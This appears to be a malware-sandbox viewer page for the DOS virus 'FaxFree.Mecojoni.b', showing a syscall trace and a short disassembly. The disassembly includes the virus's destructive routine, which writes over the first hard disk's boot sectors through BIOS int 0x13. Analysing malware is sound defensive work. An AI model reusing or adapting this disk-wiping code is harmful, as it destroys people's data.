Sample viewer

vx.netlux.org/Virus.DOS.FaxFree.Mecojoni.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:58:12.152711303Z 74 PC: 12d09 | Reallocate memory
2018-12-17T22:58:12.156002359Z 72 PC: 12d10 | Allocate memory
2018-12-17T22:58:12.157941765Z 44 PC: 1344f | Get time 0x1344f: cmp cl, byte ptr cs:[0x3d5]
0x13454: jne 0x13482
0x13456: mov dl, 0x80
0x13458: mov dh, 0
0x1345a: mov ch, 0
0x1345c: mov cl, 1
0x1345e: mov al, 9
0x13460: mov ah, 3
0x13462: int 0x13
0x13464: mov dl, 0x80
0x13466: mov dh, 1
0x13468: mov ch, 0
0x1346a: mov cl, 1
0x1346c: mov al, 9
0x1346e: mov ah, 3
0x13470: int 0x13
0x13472: mov dx, 0x333
0x13475: mov ah, 9
0x13477: int 0x21
0x13479: mov dx, 0x384
2018-12-17T22:58:12.160596746Z 72 PC: 13250 | Allocate memory
2018-12-17T22:58:12.16300397Z 75 PC: 1328b | Execute program
2018-12-17T22:58:12.181295523Z 76 PC: 13934 | Terminate with return code (Return code = '0')
2018-12-17T22:58:12.184878458Z 53 PC: 1329f | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:58:12.186515455Z 37 PC: 132b6 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:58:12.188773779Z 77 PC: 132ba | Get program return code
2018-12-17T22:58:12.190050238Z 49 PC: 132c1 | Terminate and stay resident (Return code = '0' | Memory size = '96')